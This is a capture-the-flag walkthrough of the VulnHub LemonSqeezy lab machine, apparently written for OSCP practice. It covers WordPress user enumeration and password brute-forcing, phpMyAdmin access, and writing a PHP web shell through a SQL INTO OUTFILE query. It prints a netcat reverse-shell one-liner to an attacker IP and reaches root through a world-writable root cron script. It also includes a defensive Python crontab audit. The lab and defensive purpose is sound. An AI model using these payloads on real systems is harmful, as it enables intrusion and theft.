Vulnhub: LemonSqeezy 1 Walkthrough (OSCP Prep) [by dollarboysushil]
2024-1-16 12:13:33 Author: infosecwriteups.com

nmap -sC -sV 192.168.1.133
-sC runs the default NSE scripts, -sV enumerates service versions, and -p- would scan all 65535 ports instead of nmap's default top 1000.

Looking at the result we can see only one service (http) running, on port 80.

Visiting the IP, we see the Apache2 default page.

After running gobuster we can see some directories. Among the results, wordpress and phpmyadmin are the most interesting ones.

In /phpmyadmin I tried the default credentials, which didn't work.

Under /wordpress we can see a WordPress site with the default theme and nothing much else.

Before moving on, make sure to add lemonsqeezy to /etc/hosts:
sudo nano /etc/hosts and add the IP of the machine with the name lemonsqeezy

Then I ran gobuster again under the /wordpress directory, aiming to find anything to work on. There was nothing much of use.

Since WordPress is running, let's use the wpscan tool to enumerate users.

After running wpscan we can see two users: lemon and orange.

Let's bruteforce the passwords for these users.

In the command:
--usernames specifies the usernames to try
--passwords specifies the password list, in this case rockyou.txt

We got the password for user orange, but for user lemon we were unable to bruteforce the password.

orange:ginger
lemon:??

Let's log in with the found credentials: visit /wordpress/wp-admin.

We are successfully logged in as user orange. Opening the Posts section, we can see a draft post named "Keepthis safe!".

Opening the draft post we get n0t1n@w0rdl1st!, which looks like a password for something.

First I tried this password for user lemon on WordPress, but it failed.
Then I remembered /phpmyadmin.

Under /phpmyadmin I tried to log in with this password and the username set to orange, and it worked.

orange:n0t1n@w0rdl1st!

In phpMyAdmin, the first thing I checked was the wordpress database.

Under the wp_users table, we can see the hashed password of user lemon:

lemon:$P$ByDvlux0J/6CvT2nU20bxqp/5mDxc00

I tried to crack this hash, but was unable to.
So the next best idea is to replace this hash with one we generated ourselves.

Visit: https://wprefers.com/wordpress-password-hash-generator/

On that website I entered the password newpass1 and generated a WordPress password hash.

newpass1 → $P$BMjMI8GHLJ0mtRzXyS1rv6sY5U2YDO/

Then replace lemon's stored hash with this newly generated one.

Now logging in as lemon:newpass1 works.
We have far more access in WordPress as lemon than as user orange.
From here my next step would be to paste PHP reverse shell code into the site, get it executed, and receive a reverse shell.

This didn't work, as the user didn't have the permissions needed for that.

So I planned to use a SQL query to write the malicious code instead.

Visit the phpMyAdmin page and, under the SQL section, paste this malicious query:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/wordpress/revshell.php"

<?php system($_GET['cmd']); ?>: the actual PHP code that will be executed. It uses the system function to run the command supplied in the 'cmd' parameter of the GET request.

INTO OUTFILE "/var/www/html/wordpress/revshell.php": this part tells MySQL the file path where the query result, i.e. the PHP code, will be written. It only works because the database account holds the FILE privilege and the web root is writable by the MySQL server.

Then run the query.

If we visit /wordpress/revshell.php?cmd=whoami
we can see that we are able to execute commands.

With this, we can execute a reverse shell command to get ourselves shell access.

I will be using the cheat sheet from pentestmonkey:

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

I will be using the Netcat one-liner:

nc -e /bin/sh 192.168.1.128 1234

Make sure to change the IP to your own machine's.

URL-encode this command using https://www.urlencoder.org/

Get a netcat listener ready; remember to use the same port as in the netcat command from the pentestmonkey cheat sheet.

Now paste the URL-encoded string as the cmd parameter.

Looking at the netcat listener, we should have a shell as user www-data.
This shell is not fully interactive yet, so let's upgrade it.

First run python -c 'import pty; pty.spawn("/bin/bash")'
Then background this session using Ctrl+Z.

Then run stty raw -echo && fg and enter reset.

Set the terminal type to xterm; the terminal type may be different in your case, so check before entering.

Now we have fully interactive shell.

If you are having problems upgrading the shell, watch this video.

The user.txt flag is located inside /var/www:
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
You might wonder how I found the location of user.txt. Run this command:
find / -type f -name "*.txt" 2>/dev/null
which lists the location of every .txt file on the system (errors from unreadable directories are discarded).

For escalating privileges, I will be using linpeas.

Go to /var/www/html/wordpress, as this is the only place I found where www-data can write, so the script can be downloaded there.

Then use the command
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh to download the script.

Then make the script executable with chmod +x linpeas.sh

and finally run it with ./linpeas.sh

Looking at the result, we can see an interesting cron job which runs as root:
*/2 * * * * root /etc/logrotate.d/logrotate

*/2 in the minute field means the job runs every 2 minutes.

If we look at the permissions of /etc/logrotate.d/logrotate, everyone has read, write and execute permission: the file is world-writable.

Which is the jackpot.
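The misconfiguration here is generic: a scheduled job runs as root but its script can be modified by an unprivileged user. The audit below is an added example (not from the walkthrough or from linpeas) that reads /etc/crontab- or /etc/cron.d-style text, resolves each scheduled command path and reports the ways a non-root user could change what root executes: world- or group-writable script, script owned by a non-root user, or a world-writable parent directory without the sticky bit. The fixture in `demo_results` is constructed in a temporary directory with a 0777 file named logrotate, mirroring what was found on the box, next to a 0755 control script.

```python
import os
import stat
import tempfile
from typing import Dict, List, Tuple


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (user, command_path) pairs from system-crontab style text.

    System crontabs (/etc/crontab, /etc/cron.d/*) carry a user field between
    the schedule and the command; per-user crontabs do not and are not handled.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        first = fields[0]
        # Environment assignments (SHELL=/bin/sh, PATH=...) carry no schedule.
        if "=" in first and not first[0].isdigit() and first[0] not in "*@":
            continue
        if first.startswith("@"):              # @reboot/@daily: keyword user command
            if len(fields) >= 3:
                entries.append((fields[1], fields[2]))
        elif len(fields) >= 7:                 # min hour dom mon dow user command
            entries.append((fields[5], fields[6]))
    return entries


def weaknesses(path: str, run_as: str) -> List[str]:
    """List the ways a non-root user could alter what this cron entry executes."""
    problems = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return problems            # shell builtins, relative names, missing files
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        problems.append("writable by group gid %d" % st.st_gid)
    if st.st_uid != 0 and run_as == "root":
        problems.append("owned by uid %d but runs as root" % st.st_uid)
    parent = os.path.dirname(path) or "/"
    pst = os.stat(parent)
    # A world-writable parent without the sticky bit lets anyone replace the file.
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        problems.append("parent directory world-writable")
    return problems


def audit_crontab_text(text: str) -> Dict[str, List[str]]:
    """Map each scheduled command path to its weaknesses (empty list = clean)."""
    return {path: weaknesses(path, user) for user, path in parse_system_crontab(text)}


def demo_results() -> Tuple[List[str], List[str]]:
    """Constructed fixture: a 0777 'logrotate' and a 0755 control, both scheduled as root."""
    d = tempfile.mkdtemp()
    bad = os.path.join(d, "logrotate")
    good = os.path.join(d, "safe")
    for p, mode in ((bad, 0o777), (good, 0o755)):
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho tick\n")
        os.chmod(p, mode)
    crontab = (
        "SHELL=/bin/sh\n# m h dom mon dow user command\n"
        "*/2 * * * * root %s\n0 1 * * * root %s\n@reboot root %s\n" % (bad, good, bad)
    )
    result = audit_crontab_text(crontab)
    return result[bad], result[good]


if __name__ == "__main__":
    flagged, control = demo_results()
    print("logrotate:", flagged)
    print("safe:", control)
```

Run against real hosts with `audit_crontab_text(open("/etc/crontab").read())` plus each file in /etc/cron.d; the remediation for a hit is chmod 755 and root ownership on the script and its directory, which is exactly what would have closed this path on the box.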

We will replace logrotate's contents with a malicious payload that gives us a shell.
Since logrotate runs as root every 2 minutes,

we should get a root shell.

Same as before, the payload comes from the pentestmonkey cheat sheet.

We overwrite the contents of the logrotate file using the echo command;
make sure to change the IP and port.

And have the netcat listener ready.

After 2 minutes

we should get shell as user root.

And we can read the root flag:
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=


Source: https://infosecwriteups.com/vulnhub-lemonsqeezy-1-walkthrough-oscp-prep-by-dollarboysushil-ff8789579ce3?source=rss----7b722bfd1b8d---4